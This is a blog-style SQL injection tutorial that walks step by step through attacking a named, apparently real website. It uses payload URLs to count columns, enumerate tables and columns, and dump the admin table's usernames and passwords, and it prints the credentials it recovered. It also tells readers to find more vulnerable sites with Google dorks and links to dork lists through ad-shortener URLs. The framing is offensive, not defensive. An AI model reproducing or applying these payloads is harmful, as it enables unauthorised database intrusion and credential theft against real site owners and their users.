[#]SQL INJECTION TUTORIAL BY MUHAMMAD BILAL PAK CYBER EXPERTS[#]
Finding Sites to Inject
Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here :
http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like thishttp://www.leadacidbatteryinfo.org/newsdetail.php?id=10
To check that it is vulnerable all you have to do is add '
So our link should look like that :
Press enter and you get some kind of error. The errors will vary...
Our page should look like that : (Click to Hide)
After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
If you get an error that means you should lower the number of columns .
Let's try 10.
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
The page opened normally that means the number of columns is between 10 and 14.
We try now 11.
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
The page opened normally too...
Let's try 12.
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .
Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
We should get numbers .
Our page should look like that : (Click to Hide)
For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.
Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
In our case we got "5.0.77" its >5 so we can continue.
Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
Page should look like that
Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
Now to get the ASCII value of "tbladmin" go to that site :http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler (Click to Hide)
Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladmin
Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:
Code:
116,98,108,97,100,109,105,110
Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
Our page should be like that:
Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like t
hat:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Our page should look like that :
And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !
I hope you liked my tutorial .
0 comments:
Post a Comment